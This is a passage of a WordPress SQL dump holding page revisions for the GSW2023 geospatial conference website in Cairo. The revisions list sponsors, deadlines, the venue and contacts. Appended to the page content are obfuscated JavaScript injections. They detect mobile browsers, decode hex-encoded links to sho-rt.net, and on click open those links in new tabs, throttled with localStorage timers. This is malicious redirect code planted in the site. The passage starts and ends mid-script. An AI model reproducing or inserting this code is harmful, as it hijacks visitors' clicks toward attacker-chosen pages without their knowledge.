)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 02:06:34','2023-05-16 02:06:34','',3066,'https://gsw2023.com/?p=4498',0,'revision','',0),
(4499,1,'2023-05-16 02:07:52','2023-05-16 02:07:52','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const 